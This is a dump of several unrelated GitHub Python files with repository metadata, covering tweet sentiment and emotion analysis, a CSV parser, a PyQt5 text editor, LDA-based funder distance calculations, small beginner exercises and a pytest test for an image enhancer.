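tweet texts\n# This mirrors the batched sentiment-scoring loop above: BATCH_SIZE texts per\n# forward pass keeps memory bounded, and softmax turns the raw logits into\n# per-label probabilities. A minimal sketch of the same pattern, where\n# score_batch is a hypothetical helper, not part of the original notebook:\n#\n#   def score_batch(texts, tok, mdl):\n#       enc = tok(texts, return_tensors='pt', padding=True, truncation=True).to(device)\n#       with torch.no_grad():\n#           logits = mdl(**enc)[0]\n#       return softmax(logits.detach().cpu().numpy(), axis=1)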
scores_all = np.empty((0, len(labels)))\ntext_all = sentiment_df['text'].to_list()\nn = len(text_all)\nwith torch.no_grad():\n    for start_idx in tqdm(range(0, n, BATCH_SIZE)):\n        end_idx = min(start_idx + BATCH_SIZE, n)\n        encoded_input = emotion_tokenizer(text_all[start_idx:end_idx], return_tensors='pt', padding=True, truncation=True).to(device)\n        output = emotion_model(**encoded_input)\n        scores = output[0].detach().cpu().numpy()\n        scores = softmax(scores, axis=1)\n        scores_all = np.concatenate((scores_all, scores), axis=0)\n        del encoded_input, output, scores\n        torch.cuda.empty_cache()\n    \n\n# Saving scores to sentiment dataframe\nsentiment_df['anger'] = [i[0] for i in scores_all]\nsentiment_df['joy'] = [i[1] for i in scores_all]\nsentiment_df['optimism'] = [i[2] for i in scores_all]\nsentiment_df['sadness'] = [i[3] for i in scores_all]\n\n\n# In[130]:\n\n\nsentiment_df.head()\n\n\n# In[131]:\n\n\n# Saving all scores as a dataset\nsentiment_df.to_csv(\"../data/output/roberta_scores.csv\", index=False)\n\n\n# # Sentiment and emotion analysis\n\n# ## Sentiment analysis\n\n# In[132]:\n\n\n# Reading previously generated RoBERTa scores\ntweet_df = pd.read_csv(\"../data/output/roberta_scores.csv\", lineterminator='\\n')\n\ntweet_df.head()\n\n\n# In[133]:\n\n\n# Adding a sentiment column to save overall sentiment\ntweet_df.insert(4, \"sentiment\", '')\n\ntweet_df.head(0)\n\n\n# In[134]:\n\n\n# Computing overall sentiment for each tweet\nfor i in range(len(tweet_df)):\n    if tweet_df['negative'][i] > tweet_df['positive'][i] and tweet_df['negative'][i] > tweet_df['neutral'][i]:\n        tweet_df.loc[i, 'sentiment'] = 'negative'\n    elif tweet_df['positive'][i] > tweet_df['negative'][i] and tweet_df['positive'][i] > tweet_df['neutral'][i]:\n        tweet_df.loc[i, 'sentiment'] = 'positive'\n    else:\n        tweet_df.loc[i, 'sentiment'] = 'neutral'\n\ntweet_df.head()\n\n\n# In[135]:\n\n\n# Removing +ve, -ve, neutral columns as we don't need them anymore\ntweet_df.drop(['negative','positive','neutral'], axis=1, inplace=True)\n\n\n# In[136]:\n\n\n# Saving overall sentiments as a dataset\ntweet_df.to_csv(\"../data/output/roberta_overall_sentiment.csv\", index=False)\n\n\n# ### Plot for overall sentiment of tweets\n\n# In[137]:\n\n\n# Plotting barplot for visualization\nplt.figure(figsize = (8,7))\nfig = sns.countplot(x=\"sentiment\", data=tweet_df, palette='magma')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/overall_tweet_sentiment.png', bbox_inches='tight')\n\n\n# ### Word cloud for negative, neutral and positive sentiments\n\n# In[139]:\n\n\ntweet_neg = tweet_df.loc[tweet_df['sentiment']=='negative'].reset_index(drop=True)\ntweet_net = tweet_df.loc[tweet_df['sentiment']=='neutral'].reset_index(drop=True)\ntweet_pos = tweet_df.loc[tweet_df['sentiment']=='positive'].reset_index(drop=True)\n\n\n# #### Negative sentiment word cloud\n\n# In[140]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n                      stopwords = stopwords_set,\n                      max_words = 300,\n                      max_font_size = 40,\n                      scale = 2,\n                      random_state=42\n                     ).generate(str(tweet_neg['text']))\n\n# Displaying and saving word 
cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/neutral_sentiment_wordcloud.png')\nplt.show()\n\n\n# #### Positive sentiment word cloud\n\n# In[142]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(tweet_pos['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/positive_sentiment_wordcloud.png')\nplt.show()\n\n\n# ## Emotion analysis\n\n# In[172]:\n\n\n# Reading previously generated RoBERTa scores\nemotion_df = pd.read_csv(\"../data/output/roberta_scores.csv\", lineterminator='\\n')\n\nemotion_df.head()\n\n\n# In[173]:\n\n\n# Removing +ve, -ve, neutral columns as we don't need them anymore\nemotion_df.drop(['negative', 'positive', 'neutral'], axis=1, inplace=True)\n\n# Adding a sentiment column to save overall sentiment\nemotion_df.insert(5, \"emotion\", '')\n\nemotion_df.head(0)\n\n\n# In[174]:\n\n\n# Computing overall emotion for each tweet\nfor i in range(len(emotion_df)):\n if emotion_df['anger'][i] > emotion_df['joy'][i] and emotion_df['anger'][i] > emotion_df['optimism'][i] and emotion_df['anger'][i] > emotion_df['sadness'][i]:\n emotion_df['emotion'][i] = 'anger'\n elif emotion_df['joy'][i] > emotion_df['anger'][i] and emotion_df['joy'][i] > emotion_df['optimism'][i] and emotion_df['joy'][i] > emotion_df['sadness'][i]:\n emotion_df['emotion'][i]= 'joy'\n elif emotion_df['optimism'][i] > emotion_df['anger'][i] and emotion_df['optimism'][i] > emotion_df['joy'][i] and emotion_df['optimism'][i] > emotion_df['sadness'][i]:\n emotion_df['emotion'][i]= 'optimism'\n else:\n emotion_df['emotion'][i] = 'sadness'\n\nemotion_df.head(10)\n\n\n# In[175]:\n\n\n# Removing +anger, joy, optimism, sadness columns as we don't need them anymore\nemotion_df.drop(['anger','joy','optimism','sadness'], axis=1, inplace=True)\n\n\n# In[176]:\n\n\n# Saving overall emotions as a dataset\nemotion_df.to_csv(\"../data/output/roberta_overall_emotion.csv\", index=False)\n\n\n# ### Plot for overall emotion of tweets\n\n# In[177]:\n\n\n# Plotting barplot for visualization\nplt.figure(figsize = (8,7))\nfig = sns.countplot(x=\"emotion\", data=emotion_df, palette='magma')\nfig = fig.get_figure()\n\n# Saving barplot to file\nfig.savefig('../static/overall_tweet_emotion.png', bbox_inches='tight')\n\n\n# ### Word cloud for anger, joy, optimism and sadness emotions\n\n# In[178]:\n\n\nemotion_anger = emotion_df.loc[emotion_df['emotion']=='anger'].reset_index(drop=True)\nemotion_joy = emotion_df.loc[emotion_df['emotion']=='joy'].reset_index(drop=True)\nemotion_opt = emotion_df.loc[emotion_df['emotion']=='optimism'].reset_index(drop=True)\nemotion_sad = emotion_df.loc[emotion_df['emotion']=='sadness'].reset_index(drop=True)\n\n\n# #### Anger emotion word cloud\n\n# In[179]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(emotion_anger['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/anger_emotion_wordcloud.png')\nplt.show()\n\n\n# #### Joy emotion word cloud\n\n# In[180]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n stopwords = stopwords_set,\n max_words = 300,\n max_font_size = 40,\n scale = 2,\n random_state=42\n ).generate(str(emotion_joy['text']))\n\n# Displaying 
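and saving word cloud\n# (Sketch) The repeated word-cloud cells could be collapsed into one helper;\n# save_wordcloud below is a hypothetical refactor, not part of the original notebook:\n#\n#   def save_wordcloud(text, path):\n#       wc = WordCloud(background_color='white', stopwords=stopwords_set,\n#                      max_words=300, max_font_size=40, scale=2,\n#                      random_state=42).generate(str(text))\n#       plt.imshow(wc)\n#       plt.axis('off')\n#       plt.savefig(path)\n#       plt.show()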
plt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/joy_emotion_wordcloud.png')\nplt.show()\n\n\n# #### Optimism emotion word cloud\n\n# In[181]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n                      stopwords = stopwords_set,\n                      max_words = 300,\n                      max_font_size = 40,\n                      scale = 2,\n                      random_state=42\n                     ).generate(str(emotion_opt['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/optimism_emotion_wordcloud.png')\nplt.show()\n\n\n# #### Sadness emotion word cloud\n\n# In[182]:\n\n\n# Building word cloud\nwordcloud = WordCloud(background_color='white',\n                      stopwords = stopwords_set,\n                      max_words = 300,\n                      max_font_size = 40,\n                      scale = 2,\n                      random_state=42\n                     ).generate(str(emotion_sad['text']))\n\n# Displaying and saving word cloud\nplt.imshow(wordcloud)\nplt.axis('off')\nplt.savefig('../static/sadness_emotion_wordcloud.png')\nplt.show()\n\n","repo_name":"niharjoshi/TwitterTalk","sub_path":"src/sentiment_emotion_analysis.py","file_name":"sentiment_emotion_analysis.py","file_ext":"py","file_size_in_byte":17393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33556909714","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 20 16:36:16 2019\n\n@author: gaura\n\"\"\"\n\nimport os\n\nDATADIR = \"\"\nDATAFILE = \"beatles-diskography.csv\"\n\n\ndef parse_file(datafile):\n    data = []\n    keys = []\n    row = []\n    data_point = {}\n    i = 0\n    \n    with open(datafile, \"r\") as f:\n        for line in f:\n            j = 0\n            data_point = {}\n            line = line.strip()\n            if i == 0:\n                keys = line.split(\",\")\n            if i > 10:\n                continue\n            if i >= 1:\n                row = line.split(\",\")\n                for key in keys:\n                    data_point[key] = row[j]\n                    j += 1\n                data.append(data_point)\n            \n            \n            i += 1\n    print (data)\n    return (data)\n\n\ndef test():\n    # a simple test of your implementation\n    datafile = os.path.join(DATADIR, DATAFILE)\n    d = parse_file(datafile)\n    firstline = {'Title': 'Please Please Me', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '22 March 1963', 'US Chart Position': '-', 'RIAA Certification': 'Platinum', 'BPI Certification': 'Gold'}\n    tenthline = {'Title': '', 'UK Chart Position': '1', 'Label': 'Parlophone(UK)', 'Released': '10 July 1964', 'US Chart Position': '-', 'RIAA Certification': '', 'BPI Certification': 'Gold'}\n\n    assert d[0] == firstline\n    assert d[9] == tenthline\n\n    \ntest()\n","repo_name":"gaurav-raii/Data-Extraction-and-parsing-from-Different-Formats-Web_APIs--xml--json-csv--xls--xlsx-","sub_path":"Extracting_and_Parsing_data_from_CSV.py","file_name":"Extracting_and_Parsing_data_from_CSV.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70549277651","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMessageBox, QColorDialog, QPushButton, QAction, QComboBox\nfrom PyQt5.QtGui import QFont, QPainter, QColor, QTextCursor, QIcon, QPalette\nimport sys\nimport os\nfrom interfaz.interfaz import Ui_MainWindow as text_ui\nimport io\nimport functions.about\nfrom ext import find\n\n\nclass EditorWindow(QMainWindow, text_ui):\n    def __init__(self, parent = None, file = None):\n        super(EditorWindow, self).__init__(parent)\n        self.setupUi(self)\n        self.doubleSpinBox.setValue(12)\n        # self.fontComboBox.setWritingSystem()\n\n        # backColor = 
QAction(QIcon(\"icons/backcolor.png\"),\"Change background color\",self)\n\n        self.actionNew.triggered.connect(lambda: self.NewFile(existing=True))\n        # self.actionNew.triggered.connect(lambda: NewFile(self, self.titleTemplate, existing=True))\n        self.actionOpen.triggered.connect(lambda: self.OpenFile(None))\n        # self.actionOpen.triggered.connect(lambda: OpenFile(self, None))\n        self.actionSave.triggered.connect(self.Save)\n        # self.actionSave.triggered.connect(lambda: Save(self))\n        self.actionExit.triggered.connect(lambda: sys.exit() if self.Exit() in (0, 2) else None)\n        self.actionSave_as.triggered.connect(self.Save_as)\n        # self.actionSave_as.triggered.connect(lambda: Save_as(self))\n        self.actionAcerca_de.triggered.connect(functions.about.about)\n        self.actionAbout_QT.triggered.connect(functions.about.about_qt)\n        self.actionText_Colour.triggered.connect(lambda: self.change_text_colour(\"Text\"))\n        self.actionbackground_color.triggered.connect(lambda: self.change_text_colour(\"Background\"))\n        \n        self.actionBold.triggered.connect(lambda: self.text_format(\"Bold\"))\n        self.actionItalic.triggered.connect(lambda: self.text_format(\"Italic\"))\n        self.actionUnderline.triggered.connect(lambda: self.text_format(\"Underline\"))\n\n        ### NEW ###\n        #self.findAction.triggered.connect(lambda: find.Find(self).show)\n        self.findAction.triggered.connect(find.Find(self).show)\n        ### ###\n\n        self.actionCopy.triggered.connect(lambda: self.textEdit.copy())\n        self.actionPaste.triggered.connect(lambda: self.textEdit.paste() if self.textEdit.canPaste() else None)\n        self.actionCut.triggered.connect(lambda: self.textEdit.cut())\n\n        self.textEdit.setUndoRedoEnabled(True)\n\n        self.textEdit.textChanged.connect(lambda: self.setWindowModified(True))\n\n        self.textEdit.cursorPositionChanged.connect(self.UpdateLineCol)\n        #self.textEdit.cursorPositionChanged.connect(self.updateFont)\n        self.fontComboBox.currentFontChanged.connect(self.updateFont)\n        self.doubleSpinBox.valueChanged.connect(self.updateFont)\n\n        # self.textEdit.cursorPositionChanged.connect(self.autosave)\n\n        self.statusbar.showMessage(\"Ln 1, Col 1\")\n        self.fontComboBox.setEditable(False)\n\n        self.toolBar.addWidget(self.fontComboBox)\n        self.toolBar.addWidget(self.doubleSpinBox)\n        # self.toolBar.addAction(backColor)\n\n        self.titleTemplate = \"[*]\"\n        self.filename = file\n\n        self.actionCambiar_Fondo.triggered.connect(self.Background_Color)\n\n\n        if file is not None and not os.path.exists(self.filename):\n            self.filename = None\n        \n        if self.filename is None:\n            self.NewFile()\n        else:\n            self.OpenFile(self.filename)\n            self._baseFile = os.path.basename(self.filename)\n\n        print(self.windowTitle())\n    '''\n    def ffind(self):\n        self.textEdit.textCursor().beginEditBlock()\n        doc = self.textEdit.document()\n        cursor = QTextCursor(doc)\n        while True:\n            cursor = doc.find(word, cursor)\n            if cursor.isNull():\n                break\n            if replace and newWord is not None:\n                cursor.insertText(newWord)\n\n        self.textEdit.textCursor().endEditBlock()\n    '''\n\n    def autosave(self): # not working yet, but it does not break anything; feel free to improve it\n        import time\n\n        print(\"autosave\")\n\n        time1 = time.time()\n        while time.time() - time1 < 5:\n            print (time.time())\n            if self.textEdit.textChanged:\n                return \n        \n        self.Save()\n        return\n\n\n    def NewFile(self, existing=False):\n        if existing:\n            choice = self.Exit()\n            if choice == 0:\n                self.Save()\n            elif choice == 1:\n                return\n        self.filename = None\n        self._baseFile = None\n        self.setWindowTitle(f\"Untitled {self.titleTemplate}\")\n        self.textEdit.clear()\n        
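# Reset the editor to its default state: 12 pt font, black text, a fully transparent\n        # text background (alpha 0 in the QColor below) and a white viewport, so colours\n        # from the previous document do not leak into the new document.\n        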
self.doubleSpinBox.setValue(12)\n        self.textEdit.setTextColor(QColor('#000000'))\n        self.textEdit.setTextBackgroundColor(QColor(255,255,255,0))\n        c = self.textEdit.viewport().palette()\n        c.setColor(self.textEdit.viewport().backgroundRole(), QColor(255,255,255))\n        self.textEdit.viewport().setPalette(c)\n\n\n    def OpenFile(self,file):\n        if file is None:\n            tmpFile, ok = QFileDialog.getOpenFileName(self, \"Open File\", str(os.path.abspath(os.getcwd())), filter=\"All Files (*.*);;Text (*.txt);;HTML (*.html);;Chukurh (*.chk)\", initialFilter=\"Chukurh (*.chk)\")\n            if not ok:\n                return\n            \n            if tmpFile == '':\n                QMessageBox.critical(self, 'Error', \"Operacion 'abrir archivo' cancelada por el usuario \")\n                return\n            \n            self.filename = tmpFile\n        \n        self._baseFile = os.path.basename(self.filename)\n        self.setWindowTitle(self._baseFile + self.titleTemplate)\n\n        self.textEdit.clear()\n        with io.open(self.filename, 'r', encoding='utf8') as f:\n            if \".txt\" in self.filename:\n                self.textEdit.setPlainText(f.read())\n            elif \".html\" in self.filename or \".chk\" in self.filename:\n                self.textEdit.setHtml(f.read())\n            else:\n                self.textEdit.setPlainText(f.read())\n\n        self.setWindowModified(False)\n\n\n    def write_file(self, ok):\n        with io.open(self.filename, 'w', encoding='utf8') as f:\n            if \".chk\" in ok or \".html\" in ok:\n                color = f'background-color:{self.textEdit.viewport().palette().color(self.textEdit.viewport().backgroundRole()).name()};'\n                html = self.textEdit.toHtml()\n                html = html.splitlines()\n                temp = html[3]\n                body_style = temp[:-2] + color + temp[-2:]\n                html_final = ''\n                for i in html:\n                    if i == temp:\n                        html_final += body_style + '\\n'\n                    else:\n                        html_final += i + '\\n'\n                f.write(html_final)\n            else:\n                f.write(self.textEdit.toPlainText())\n\n\n    def Save(self):\n        if not self.isWindowModified():\n            return\n        \n        if self.filename is None:\n            tmpFile, ok = QFileDialog.getSaveFileName(self, \"Save File\", str(os.path.abspath(os.getcwd())), filter=\"All Files (*.*);;Text (*.txt);;HTML (*.html);;Chukurh (*.chk)\", initialFilter=\"Chukurh (*.chk)\")\n            if not ok:\n                return\n            if tmpFile == '':\n                QMessageBox.critical(self, 'Error', \"Guardado de archivo cancelado por el usuario\")\n                return\n            \n            self.filename = tmpFile\n            self._baseFile = os.path.basename(self.filename)\n        \n        self.setWindowTitle(self._baseFile + self.titleTemplate)\n\n        self.write_file(ok)\n        \n        self.setWindowModified(False)\n\n\n    def Save_as(self):\n        tmpFile, ok = QFileDialog.getSaveFileName(self, \"Save File\", str(os.path.abspath(os.getcwd())), filter=\"All Files (*.*);;Text (*.txt);;HTML (*.html);;Chukurh (*.chk)\", initialFilter=\"Chukurh (*.chk)\")\n\n        if not ok:\n            return\n\n        if tmpFile == '':\n            QMessageBox.critical(self, 'Error', \"Guardado de archivo cancelado por el usuario\")\n            return\n\n        self.filename = tmpFile\n        self._baseFile = os.path.basename(self.filename)\n        \n        self.setWindowTitle(self._baseFile + self.titleTemplate)\n\n        self.write_file(ok)\n        \n        self.setWindowModified(False)\n\n\n\n    def closeEvent(self, a0):\n        # print(\"Puchaste x\")\n        check = self.Exit()\n        if check == 2 or check == 0:\n            print(\"Adios\")\n            a0.accept()\n        else:\n            print(\"Nel\")\n            a0.ignore()\n    \n    def Exit(self): \n        if not self.isWindowModified():\n            return 0\n        # sys.exit()\n        else:\n            msg = QMessageBox()\n            msg.setIcon(QMessageBox.Information)\n\n            msg.setText(\"Salir sin guardar\")\n            msg.setInformativeText(\"Todos los cambios se perderan\")\n            msg.setWindowTitle(\"Advertencia\")\n            \n            # msg.addButton(QMessageBox.Discard)\n            # msg.addButton(QMessageBox.Save )\n            # msg.addButton(QMessageBox.Cancel)\n            \n            
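# Button-role mapping used below (per Qt's QMessageBox.ButtonRole enum):\n            # Save -> AcceptRole, Discard -> DestructiveRole, Cancel -> RejectRole.\n            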
msg.setStandardButtons(QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n            msg.setDefaultButton(QMessageBox.Save)\n            # msg.buttonClicked.connect(Check)\n            \n            buttonY = msg.button(QMessageBox.Save)\n            buttonY.setText('Guardar')\n            buttonN = msg.button(QMessageBox.Discard)\n            buttonN.setText('Descartar')\n            buttonO = msg.button(QMessageBox.Cancel)\n            buttonO.setText('Cancelar')\n            \n            if msg.exec():\n                if msg.buttonRole(msg.clickedButton()) == QMessageBox.DestructiveRole:\n                    #print(\"Discard\")\n                    return 2\n                elif msg.buttonRole(msg.clickedButton()) == QMessageBox.AcceptRole:\n                    # i.text() == \"Save \n                    #print(\"Save\")\n                    self.Save()\n                    # sys.exit()\n                    return 0\n                elif msg.buttonRole(msg.clickedButton()) == QMessageBox.RejectRole:\n                    #i.text() == \"cancel\"\n                    print(\"cancel\")\n                    print(False)\n                    return 1\n\n\n    def UpdateLineCol(self):\n        line = self.textEdit.textCursor().blockNumber() + 1\n        col = self.textEdit.textCursor().columnNumber() + 1\n        self.statusbar.showMessage(f\"Ln {line}, Col {col}\")\n\n    def updateFont(self):\n        Font = self.fontComboBox.currentFont()\n        FontFam = Font.family()\n        indexOf = self.fontComboBox.findText(FontFam)\n        self.fontComboBox.setCurrentIndex(indexOf)\n        self.textEdit.setFont(Font)\n        self.textEdit.setCurrentFont(Font)\n        self.textEdit.setFontPointSize(self.doubleSpinBox.value())\n    \n\n    \n    def change_text_colour(self, value):\n        ColorD = QColorDialog(self)\n        if value == \"Text\":\n            ColorD.colorSelected.connect(self.textEdit.setTextColor)\n        elif value == \"Background\":\n            ColorD.colorSelected.connect(self.textEdit.setTextBackgroundColor)\n        ColorD.open()\n\n    \n\n    def text_format(self, value): \n        # italic\n        # bold\n        # underline, etc\n        # print(f\"Cambiar {value}\")\n        if value == \"Bold\":\n            if self.textEdit.fontWeight() != QFont.Bold:\n                self.textEdit.setFontWeight(QFont.Bold)\n            else:\n                self.textEdit.setFontWeight(QFont.Normal)\n        elif value == \"Italic\":\n            if not self.textEdit.fontItalic():\n                self.textEdit.setFontItalic(True)\n            else:\n                self.textEdit.setFontItalic(False)\n        elif value == \"Underline\":\n            if not self.textEdit.fontUnderline():\n                self.textEdit.setFontUnderline(True)\n            else:\n                self.textEdit.setFontUnderline(False)\n        \n\n    def search_and_replace(self, word, newWord = None, replace = False):\n        self.textEdit.textCursor().beginEditBlock()\n        doc = self.textEdit.document()\n        cursor = QTextCursor(doc)\n        while True:\n            cursor = doc.find(word, cursor)\n            if cursor.isNull():\n                break\n            if replace and newWord is not None:\n                cursor.insertText(newWord)\n\n        self.textEdit.textCursor().endEditBlock()\n\n\n\n    def Background_Color(self):\n        c = self.textEdit.viewport().palette()\n        ColorD = QColorDialog(self)\n        # ColorD.colorSelected.connect(c.setColor(self.textEdit.viewport().backgroudRole()))\n        # ColorD.exec()\n        # print(ColorD.currentColor())\n        c.setColor(self.textEdit.viewport().backgroundRole(), ColorD.getColor())\n        self.textEdit.viewport().setPalette(c)\n        print(self.textEdit.viewport().palette().color(self.textEdit.viewport().backgroundRole()).name())\n        # print(c.name())\n\n\n","repo_name":"EMACC99/Procesador_de_texto","sub_path":"functions/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":12772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9862071686","text":"import gensim\nimport pandas as pd\nimport re\nimport numpy as np\nimport random\nfrom scipy.spatial.distance import cosine\n\n# load LDA model, dictionary and corpus\n#dictionary = gensim.corpora.Dictionary.load('../clean-data/fine-scale/all-countries/dictionary.dict')\ncorpus = gensim.corpora.MmCorpus('./clean-data/fine-scale/all-countries/corpus.mm')\nlda = gensim.models.ldamulticore.LdaMulticore.load('./models/fine-scale/all-countries/model_140_topics')\n\n# load 
metadata\nukri_metadata = pd.read_csv(\"./clean-data/fine-scale/UK/UKRI/UKRI_project_metadata.csv\")\n# the USA project id column is all digits, so pandas would otherwise parse it as numeric; coerce it to string to avoid problems when concatenating with the UKRI data.\nus_metadata = pd.read_csv(\"./clean-data/fine-scale/USA/NSF/NSF_project_metadata.csv\", dtype=\"object\")\n\n# row-bind the datasets together and reset the index to match the corpus; the datasets have more rows than the corpus because not all projects were used to fit the LDA (for example projects that did not have titles or abstracts)\ndf_meta = pd.concat([ukri_metadata, us_metadata]).reset_index()\n\n## COMBINE METADATA WITH CORPUS IDS ##\n\n# load ordered project ID\nproject_id_ordered = pd.read_csv(\"./clean-data/fine-scale/all-countries/projectID_corpus.csv\")\n# remove .txt from end\nproject_id_ordered[\"ProjectId\"] = project_id_ordered[\"ProjectId\"].apply(lambda x: re.sub(\".txt\", \"\", x))\n# merge project ids and metadata on their shared columns\ndf_meta_joined = project_id_ordered.merge(df_meta, on=[\"ProjectId\", \"Country\", \"CountryFundingBody\"])\n\n## Load doc-topic matrix\ndoc_topic_mat = np.load(\"./results/fine-scale/all-countries/doc_topic_mat.npy\")\n# zero out negligible topic weights\ndoc_topic_mat[doc_topic_mat < 0.01] = 0.0\n\n# filter out docs with no topics (shouldn't exist with the new minimum probability...)\nno_topic_index = np.sum(doc_topic_mat, axis=0) > 0\n\n# remove the corresponding rows from the metadata\ndf_meta_joined = df_meta_joined[no_topic_index].reset_index()\ndoc_topic_mat = doc_topic_mat[:, no_topic_index]\n\n\n# Calculate funding body distances\n## DISTANCE MATRIX ##\n\n# To get distances between research councils we:\n# 1) Calculate the distance in topic space of each pair of documents (might need to sample if too large...)\n# 2) Summarise the distances within and between research councils\n\n## Distance measure\ndef Hellinger(p, q):\n    # Hellinger distance between p and q,\n    # two np array probability distributions\n    n = len(p)\n    total = 0.0  # renamed from 'sum' to avoid shadowing the builtin\n    for i in range(n):\n        total += (np.sqrt(p[i]) - np.sqrt(q[i]))**2\n    result = (1.0 / np.sqrt(2.0)) * np.sqrt(total)\n    return result\n\nfunders = df_meta_joined[\"FundingBody\"].unique()\n\nN = len(funders)\nN_sample = 3000\n\n# empty N x N x N_sample array to store the sampled pairwise distances\nHellinger_distance = np.zeros((N, N, N_sample))\n\n# for every funder\nfor i in range(N):\n    # and every funder in the upper triangle\n    for j in range(i, N):\n        # get samples\n        indx_1 = df_meta_joined[df_meta_joined.FundingBody == funders[i]].index\n        indx_2 = df_meta_joined[df_meta_joined.FundingBody == funders[j]].index\n\n        print(len(indx_1), len(indx_2))\n\n        indx_1 = random.sample(sorted(indx_1), N_sample)\n        indx_2 = random.sample(sorted(indx_2), N_sample)\n        for a, (k, l) in enumerate(zip(indx_1, indx_2)):\n            # indx = (doc_topic_mat[:,k] != 0) | (doc_topic_mat[:,l] !=0)\n            # Hellinger distance between the two documents' topic distributions\n            dis = Hellinger(doc_topic_mat[:, k], doc_topic_mat[:, l])\n            Hellinger_distance[i, j, a] = Hellinger_distance[j, i, a] = dis\n\n# save d_mat\nnp.save(\"./results/fine-scale/all-countries/funder_distances.npy\", Hellinger_distance)\n\n# save funders\nwith open(\"./results/fine-scale/all-countries/funder_index.txt\", \"w\") as fn:\n    
fn.writelines(\"\\n\".join(funders))\n","repo_name":"FCBT/Funding-Landscape","sub_path":"code/old/07_get_distance_matrix_funders.py","file_name":"07_get_distance_matrix_funders.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2266372342","text":"def pattern(a, c):\n if c == True:\n i = 0\n while i < a:\n print(\" * \" * (i + 1))\n i = i + 1\n elif c == False:\n i = a\n while i > 0:\n print(\" * \" * i)\n i = i - 1\n\n\na = int(input('Enter no. of rows:\\n'))\nb = int(input('0 or 1?\\n'))\nc = bool(b)\npattern(a, c)\n","repo_name":"Yashthon/Asterisk-Pattern-Printing","sub_path":"Asterisk-Pattern-Printing.py","file_name":"Asterisk-Pattern-Printing.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"28591731918","text":"\"\"\"\nEjercicio 1\nEscribe una frase aleatoria de una lista de strings cada 3 segundos.\n\n\"\"\"\nimport random\n\n\n# Funciones\ndef random_index(variable,lista):\n if variable:\n index = random.randint(0, len(text_list) - 1)\n print(\"Tu frase es: \" + text_list[index])\n else:\n print(\"Que lastima. Nos vemos la proxima. Igual me has tenido que leer jeje\")\n return\n\n\ndef ask_yes_or_no(message):\n response = None\n while response != \"s\" and response != \"n\":\n response = input(message + \"[s/n]:\")\n return response == \"s\"\n\n\ndef main():\n print(\"Te mostrare una frase aleatoria de mi lista de frases..\")\n a = True\n while a:\n a = ask_yes_or_no(\"Quieres una frase?\")\n random_index(a, text_list)\n\n\nif __name__ == '__main__':\n text_list = [\"Hola mundo!\", \"En memoria del mas...\", \"Perdedor\", \"Aca hay algo raro\", \"Otra frase mas para esta lista\", \"Ya no se me ocurre mas\", \"O.. 
si ?\"]\n main()","repo_name":"rbo93/mi_primer_programa","sub_path":"Ejercicios Realizados/Random/archivos_ejercicio_uno.py","file_name":"archivos_ejercicio_uno.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1123138478","text":"\nimport io\nimport pytest\nfrom fastapi import UploadFile\nfrom typing import Tuple\nfrom app import ImageUpload, ImageComparison, EnhancedImage, ImageQualityEnhancer\n\n# Import any additional libraries as needed\n\n# Mocked input and expected output data for tests\nTEST_CASES = [\n {\n \"input\": ImageUpload(\n image=UploadFile(\n filename=\"test_image.jpg\",\n file=io.BytesIO(b\"original_image_data\"),\n ),\n ),\n \"expected_output\": (\n ImageComparison(\n original_image=b\"original_image_data\",\n enhanced_image=b\"enhanced_image_data\",\n edits=[\"edit1\", \"edit2\"],\n ),\n EnhancedImage(enhanced_image=b\"enhanced_image_data\"),\n ),\n },\n # Add more test cases as needed\n]\n\n# Mock the superclass transform method to return the desired output for testing\nasync def mocked_transform(*args, **kwargs):\n return [\n ImageComparison(original_image=b\"original_image_data\", enhanced_image=b\"enhanced_image_data\", edits=[\"edit1\", \"edit2\"]),\n EnhancedImage(enhanced_image=b\"enhanced_image_data\"),\n ]\n\n# Use pytest.mark.parametrize to create multiple test scenarios\n@pytest.mark.parametrize(\"test_case\", TEST_CASES)\nasync def test_transform(test_case: dict):\n # Set mocked input data and expected output data\n input_data: ImageUpload = test_case[\"input\"]\n expected_output: Tuple[ImageComparison, EnhancedImage] = test_case[\"expected_output\"]\n\n # Create an instance of the component and test the transform() method\n image_quality_enhancer = ImageQualityEnhancer()\n image_quality_enhancer.super().transform = mocked_transform # Override the superclass method with the mocked version\n\n output = await image_quality_enhancer.transform(input_data, callbacks=None)\n\n # Assert that the output matches the expected output\n assert output == expected_output\n\n # Add error handling and edge cases if 